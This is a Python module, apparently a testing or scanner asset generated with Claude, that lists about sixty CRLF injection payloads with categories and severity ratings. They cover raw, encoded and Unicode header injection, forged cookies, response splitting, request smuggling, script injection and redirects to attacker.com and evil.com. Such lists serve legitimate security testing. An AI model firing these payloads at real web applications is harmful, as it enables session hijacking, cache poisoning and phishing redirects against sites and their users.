"""crlf_injection_payloads — generated dev-time by Claude. Webapp module asset.
"""

CRLF_INJECTION_PAYLOADS = [{'payload': 'foo\r\nX-Injected: bar', 'category': 'raw_crlf', 'severity': 'HIGH'},
 {'payload': 'foo\r\nSet-Cookie: session=evil', 'category': 'raw_crlf', 'severity': 'HIGH'},
 {'payload': 'foo\r\nLocation: https://evil.com', 'category': 'raw_crlf', 'severity': 'HIGH'},
 {'payload': 'foo\r\nContent-Type: text/html\r\n\r\n<script>alert(1)</script>',
  'category': 'raw_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo\r\nHTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\ninjected',
  'category': 'raw_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo\r\nX-Forwarded-For: 127.0.0.1', 'category': 'raw_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo\r\nAccess-Control-Allow-Origin: *', 'category': 'raw_crlf', 'severity': 'HIGH'},
 {'payload': 'foo\r\nCache-Control: no-cache\r\nX-Evil: injected', 'category': 'raw_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo\r\nContent-Length: 0\r\n\r\nGET /evil HTTP/1.1\r\nHost: attacker.com',
  'category': 'raw_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1',
  'category': 'raw_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo\r\nAuthorization: Bearer eviltoken', 'category': 'raw_crlf', 'severity': 'HIGH'},
 {'payload': 'foo\r\nProxy-Authorization: Basic dXNlcjpwYXNz', 'category': 'raw_crlf', 'severity': 'HIGH'},
 {'payload': 'foo\r\nReferer: https://attacker.com', 'category': 'raw_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo\r\nHost: attacker.com', 'category': 'raw_crlf', 'severity': 'HIGH'},
 {'payload': 'foo\r\nX-Custom-Header: injected\r\nAnother-Header: value', 'category': 'raw_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo\r\nContent-Disposition: attachment; filename=evil.html',
  'category': 'raw_crlf',
  'severity': 'MEDIUM'},
 {'payload': 'foo\r\nStrict-Transport-Security: max-age=0', 'category': 'raw_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo\r\nX-Frame-Options: ALLOWALL', 'category': 'raw_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo\r\nContent-Security-Policy: default-src *', 'category': 'raw_crlf', 'severity': 'HIGH'},
 {'payload': 'foo\r\nWWW-Authenticate: Basic realm=evil', 'category': 'raw_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%0d%0aX-Injected:%20bar', 'category': 'url_encoded_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%0d%0aSet-Cookie:%20session=hijacked', 'category': 'url_encoded_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%0d%0aLocation:%20https://attacker.com', 'category': 'url_encoded_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<script>alert(1)</script>',
  'category': 'url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%0d%0aAccess-Control-Allow-Origin:%20*', 'category': 'url_encoded_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%0aX-Injected:%20newline-only', 'category': 'url_encoded_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html',
  'category': 'url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%0d%0aX-Forwarded-Host:%20evil.com', 'category': 'url_encoded_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%0d%0aProxy-Authenticate:%20Basic%20realm=attacker',
  'category': 'url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%0d%0aX-Real-IP:%20127.0.0.1', 'category': 'url_encoded_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo%0d%0aReferer:%20https://evil.com%0d%0aX-Extra:%20injected',
  'category': 'url_encoded_crlf',
  'severity': 'MEDIUM'},
 {'payload': 'foo%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/admin%20HTTP/1.1',
  'category': 'url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%0d%0aAuthorization:%20Bearer%20malicioustoken', 'category': 'url_encoded_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%0d%0aCache-Control:%20no-store', 'category': 'url_encoded_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo%0d%0aX-Cache:%20HIT%0d%0aX-Evil:%20injected', 'category': 'url_encoded_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo%250d%250aX-Injected:%20bar', 'category': 'double_url_encoded_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%250d%250aSet-Cookie:%20admin=true', 'category': 'double_url_encoded_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%250d%250aLocation:%20https://attacker.com',
  'category': 'double_url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%250d%250aContent-Type:%20text/html%250d%250a%250d%250a<svg/onload=alert(1)>',
  'category': 'double_url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%250aX-Injected:%20lf-only-double-encoded',
  'category': 'double_url_encoded_crlf',
  'severity': 'MEDIUM'},
 {'payload': 'foo%25%30%64%25%30%61X-Injected:%20fragmented',
  'category': 'double_url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%250d%250aAccess-Control-Allow-Origin:%20*',
  'category': 'double_url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%250d%250aHTTP/1.1%20302%20Found%250d%250aLocation:%20https://evil.com',
  'category': 'double_url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%250d%250aX-Forwarded-For:%20127.0.0.1', 'category': 'double_url_encoded_crlf', 'severity': 'MEDIUM'},
 {'payload': 'foo%250d%250aAuthorization:%20Basic%20ZXZpbDpwYXNz',
  'category': 'double_url_encoded_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%E5%98%8A%E5%98%8DX-Injected:%20unicode-crlf', 'category': 'unicode_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%E5%98%8A%E5%98%8DSet-Cookie:%20session=evil', 'category': 'unicode_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%E5%98%8A%E5%98%8DLocation:%20https://attacker.com', 'category': 'unicode_crlf', 'severity': 'HIGH'},
 {'payload': 'foo%E5%98%8A%E5%98%8DContent-Type:%20text/html%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D<script>alert(1)</script>',
  'category': 'unicode_crlf',
  'severity': 'HIGH'},
 {'payload': 'foo%E5%98%8A%E5%98%8DAccess-Control-Allow-Origin:%20*', 'category': 'unicode_crlf', 'severity': 'HIGH'},
 {'payload': 'foo\r\nSet-Cookie: admin=true; Path=/; HttpOnly', 'category': 'set_cookie_injection', 'severity': 'HIGH'},
 {'payload': 'foo%0d%0aSet-Cookie:%20auth=bypassed;%20Secure;%20HttpOnly;%20SameSite=None',
  'category': 'set_cookie_injection',
  'severity': 'HIGH'},
 {'payload': 'foo\r\nSet-Cookie: __Host-session=evil; Path=/; Secure',
  'category': 'set_cookie_injection',
  'severity': 'HIGH'},
 {'payload': 'foo%0d%0aSet-Cookie:%20PHPSESSID=hijacked1234; Domain=.target.com',
  'category': 'set_cookie_injection',
  'severity': 'HIGH'},
 {'payload': 'foo\r\nSet-Cookie: token=malicious; expires=Fri, 01 Jan 2099 00:00:00 GMT; Path=/',
  'category': 'set_cookie_injection',
  'severity': 'HIGH'},
 {'payload': 'foo\r\nLocation: https://attacker.com', 'category': 'location_open_redirect', 'severity': 'HIGH'},
 {'payload': 'foo%0d%0aLocation:%20//attacker.com/%2F..%2F', 'category': 'location_open_redirect', 'severity': 'HIGH'},
 {'payload': 'foo\r\nLocation: https://trusted.com.attacker.com/',
  'category': 'location_open_redirect',
  'severity': 'HIGH'},
 {'payload': 'foo%0d%0aLocation:%20https://attacker.com%3Ftrusted.com',
  'category': 'location_open_redirect',
  'severity': 'HIGH'},
 {'payload': 'foo\r\nHTTP/1.1 302 Found\r\nLocation: https://attacker.com\r\nContent-Length: 0',
  'category': 'location_open_redirect',
  'severity': 'HIGH'}]
